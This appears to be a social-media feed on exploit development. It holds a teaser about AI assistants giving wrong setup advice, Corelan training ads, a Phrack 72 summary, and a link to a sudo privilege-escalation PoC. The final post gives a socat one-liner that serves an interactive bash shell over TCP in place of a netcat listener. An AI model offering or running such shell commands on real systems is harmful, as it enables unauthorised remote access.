War diary from LLM-assisted pentesting. Needed a vulnerable Eclipse Che instance for my Metasploit PR (CVE-2025-12548). Asked Grok 4 and Claude Sonnet 4.6 — both confidently wrong in different ways. Phantom CLI flags, CrashLoopBackOffs, invisible trailing newlines.
The fix came from plain old human debugging instinct, not a clever prompt.
https://payloadforge.io/i-asked-two-ais-to-help-me-set-up-a-test-environment-heres-what-actually-happened/
#Metasploit #OffSec #ExploitDev #LLM
I Asked Two AIs to Help Me Set Up a Test Environment. Here's What Actually Happened.

Payload Forge

⏱️ Tick. Tick. Tick.

🚨 LAST CALL — AUSTRALIA

Corelan Stack → Corelan Heap
Back-to-back • Melbourne

Last seats • Final week • Unbeatable price

📅 Stack: 3–6 Feb
📅 Heap: 9–12 Feb

👉 Register now:

https://events.humanitix.com/corelan-stack-based-exploit-development-heap-exploitation-masterclass-ve2gkbs9

#corelan #exploitdev #melbourne #lastcall

🔥🚨 𝗟𝗔𝗦𝗧 𝗖𝗔𝗟𝗟 — 𝗟𝗔𝗦𝗧 𝗗𝗔𝗬𝗦 · 𝗙𝗜𝗡𝗔𝗟 𝗦𝗘𝗔𝗧𝗦 🚨🔥

🇸🇬 Corelan Heap — Singapore

📅 Jan 12–15, 2026

🧠 Evidence-based learning
🔬 Learn how to do your own research
🧩 Memorigami — deep heap internals
💧 Memory leak strategies
🛠️ Heap exploitation

🎓 Corelan Heap + Stack = CCED

👉 https://www.redfacers.com/academy/corelan

#corelan #heap #memorigami #exploitdev #cced #singapore

🚨 For the FIRST TIME EVER 🚨

🌍🔥 Corelan Heap — Istanbul, Turkey 🔥🌍
🤝 In collaboration with Hackers Academy

🧠 Windows heap internals
🪄 Precise heap layout control (Memorigami)
🛠️ Hands-on, real-world exploit scenarios

📍 March 23-26, 2026

🔗 https://corelan.hackersacademy.com/

#corelan #heap #exploitdev #cced

2026 is around the corner, some will earn CCED.

Will you be one of them?

www.corelan-certified.com

#corelan #stack #heap #masterclass #road2cced #cced #corelanacademy #exploitdev #windows11

⚠️ Afraid of public classes?

🔒 Corelan Academy = private, intense, small-group exploit dev training

2–8 ppl • one-on-one access • flexible timing • competitive pricing • Stack & Heap

DM or reply interested

#corelan #exploitdev #training #heap #stack #corelanacademy

🚨 Phrack #72 is out!

The legendary hacker zine returns with a powerhouse issue covering everything from PHP exploitation & Rsync RCE, to North Korean APT leaks, LLM-powered fuzzing, and vulnerabilities in critical infrastructure (C-V2X roadside units).

This issue blends deep technical research, real-world 0days, and hacker culture manifestos—a reminder that hacking is both an art and a science.

👉 Full issue : https://phrack.org/issues/72

📊 Focus Areas

Phrack Prophile on Gera Hacker culture, early disassembly, community history

Linenoise CHERI architecture, memory safety, capability exploits

The Art of PHP – CTF Journey PHP exploitation, CTF insights, serialization bugs

Guarding the PHP Temple Auditing & exploiting outdated PHP appliances

APT Down – The North Korea Files Kimsuky APT leaks, backdoors, state hacking vs hacking ethos

Desync the Planet – Rsync RCE Remote code execution via rsync memory corruption

Revisiting Android App Similarities App similarity detection, modern analysis of APKs

E0 – Selective Symbolic Instrumentation Hybrid fuzzing + symbolic exec + LLM reasoning for vuln discovery

Roadside to Everyone (C)V2X roadside unit firmware flaws, backdoors, CVEs

🌐 Overview

Cultural & Historical → Gera’s profile + Hacker Renaissance manifesto.

Exploitation & Research → PHP chains, CHERI, Rsync memory corruption.

Threat Intel → Leaked North Korean APT tooling, espionage tactics.

Emerging Frontiers → Symbolic fuzzing w/ LLMs, insecure V2X roadside units.

This issue captures both hacker nostalgia and cutting-edge innovation—a true renaissance of the underground.

#Phrack #Infosec #CyberSecurity #Hacking #CTF #ExploitDev #ReverseEngineering #BugBounty #MalwareAnalysis #Fuzzing

.:: Phrack Magazine ::.

Phrack staff website.

Just published a proof-of-concept exploit for CVE-2025-32463, a new Linux privilege escalation vulnerability affecting sudo discovered and disclosed by Stratascale about 2 weeks ago.

The PoC is available on GitHub. A full technical writeup will be published on my blog soon.

GitHub: https://github.com/morgenm/sudo-chroot-CVE-2025-32463

#CyberSecurity #ExploitDev #Linux #CVE #PrivilegeEscalation #Infosec #Exploit #Rust #PrivEsc

GitHub - morgenm/sudo-chroot-CVE-2025-32463: Rust PoC for CVE-2025-32463 (sudo chroot "chwoot" Local PrivEsc)

Rust PoC for CVE-2025-32463 (sudo chroot "chwoot" Local PrivEsc) - morgenm/sudo-chroot-CVE-2025-32463

GitHub

🔔 Reminder: Zürich, Corelan Stack is coming Oct 7–10, 2025
✅ No nonsense, No BS
✅ Just real-world exploit dev skills

🎟️ https://www.eventcreate.com/e/sigs-corelan-stack-based-exploit-development

💛 RT appreciated! #corelan #win11 #exploitdev

If you're still battling netcat for stable reverse shells over shaky connections?

Replace nc -lvnp <port> with:
socat TCP-L:<port> EXEC:'bash -li',pty,stderr,setsid,sane

TTY hell is optional. socat gives you a proper interactive PTY every time.

#ExploitDev #RedTeam #Pentesting #Shells #Hacking